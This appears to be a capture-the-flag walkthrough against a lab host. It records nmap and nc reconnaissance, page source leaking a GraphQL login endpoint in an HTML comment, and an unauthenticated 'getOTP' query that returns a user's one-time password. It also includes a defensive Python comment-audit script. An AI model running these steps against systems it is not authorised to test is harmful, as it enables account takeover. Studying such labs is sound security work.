Portal to my Matrix (Professional Portfolio)
Target 192.168.213.170
nmap 192.168.213.170 -p 22,80,5132,8433 -sV -vvv -T4 --open -Pn
New option: --open shows only open ports.
Tip for -Pn: it skips host discovery and treats the host as up. Nmap normally port-scans only hosts that answer its discovery probes, so if I know a port is open but a firewall or proxy is blocking those probes, -Pn forces the normal port scan anyway.
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
5132/tcp open unknown syn-ack
8433/tcp open http syn-ack Werkzeug httpd 2.0.2 (Python 3.8.10)
Check the website on 80
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Under Maintainence</title>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<style>
body {
background: #dedede;
}
.page-wrap {
min-height: 100vh;
}
</style>
</head>
<body>
<div class="page-wrap d-flex flex-row align-items-center">
<div class="container">
<div class="row justify-content-center">
<div class="col-md-12 text-center">
<span class="display-1 d-block">Under Maintainence</span>
<div class="mb-4 lead">For sometime web UI will stay down, please use the CLI application on port 5132</div>
</div>
</div>
</div>
</div>
<!--commenting the code until we fix the whole application-->
<!--<div class="row">-->
<!--<div class="col-lg-4 col-sm-offset-2">-->
<!--<div class="panel panel-primary">-->
<!--<div class="panel-heading">Login</div>-->
<!--<div class="panel-body">-->
<!--<div class="col-md-6">-->
<!--<form method="post" action="http://127.0.0.1:8433/graphql?query={login(username:$uname, password:$pswd)}" enctype="multipart/form-data">-->
<!--<div class="form-group">-->
<!--<label for="uname">Username</label>-->
<!--<input type="text" placeholder="username" name="uname" class="form-control"><br>-->
<!--<label for="pswd">Password</label>-->
<!--<input type="text" placeholder="password" name="pswd" class="form-control"><br>-->
<!--<button class="btn btn-primary" type="submit">Submit</button>-->
<!--</div>-->
<!--</form>-->
<!--</div>-->
<!--</div>-->
<!--<div class="panel-footer">-->
<!--<center>-->
<!--<p style="font-size:2em;color: black"> </p>-->
<!--</center>-->
<!--</div>-->
<!--</div>-->
<!--</div>-->
<!--</div>-->
</body>
</body>
</html>
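The commented-out login form in this page source is what reveals the GraphQL endpoint on 8433 and its login query format. As an added example (not part of the original notes), here is a pre-deployment check in Python that flags HTML comments carrying URLs or form markup. The function name audit_comments, the patterns and the trimmed sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Patterns that should not survive in comments shipped to production.
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")
MARKUP_RE = re.compile(r"<\s*(form|input|script)\b", re.I)
# Illustrative subset of internal address prefixes, not a complete list.
INTERNAL_RE = re.compile(r"//(127\.|10\.|192\.168\.|localhost)")


class CommentAudit(HTMLParser):
    """Collects findings from HTML comments only; live markup is ignored."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_comment(self, data):
        line = self.getpos()[0]  # line on which the comment starts
        for url in URL_RE.findall(data):
            kind = "internal-url" if INTERNAL_RE.search(url) else "url"
            self.findings.append((line, kind, url))
        m = MARKUP_RE.search(data)
        if m:
            self.findings.append((line, "markup", m.group(1).lower()))


def audit_comments(html_text):
    """Return (line, kind, detail) tuples for risky content in HTML comments."""
    parser = CommentAudit()
    parser.feed(html_text)
    parser.close()
    return parser.findings


# Constructed sample: a trimmed copy of the port 80 page source shown above.
SAMPLE = """<body>
<div class="mb-4 lead">please use the CLI application on port 5132</div>
<!--commenting the code until we fix the whole application-->
<!--<form method="post" action="http://127.0.0.1:8433/graphql?query={login(username:$uname, password:$pswd)}" enctype="multipart/form-data">-->
<!--<input type="text" placeholder="username" name="uname" class="form-control"><br>-->
<!--</form>-->
</body>"""

if __name__ == "__main__":
    for line, kind, detail in audit_comments(SAMPLE):
        print(f"line {line}: {kind}: {detail}")
```

Run against the built templates before release, any internal-url or markup finding is a reason to delete the comment rather than ship it.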
Now to check port 5132
Run nc to check
nc -v 192.168.213.170 5132
192.168.213.170: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.213.170] 5132 (?) open
Enter Username: admin One Shot
Enter OTP: 3425752 Random
Incorrect username or password
The service asks for a username and an OTP.
Port 8433 runs GraphQL; the login query format is visible in the commented-out form in the port 80 page source.
Use GraphQL to pull data from the app. Query:
{
  getOTP(username:"peter")
}
Response:
{
  "data": {
    "getOTP": "Your One Time Password is: nuWWLk8Ub05tP6zJ"
  }
}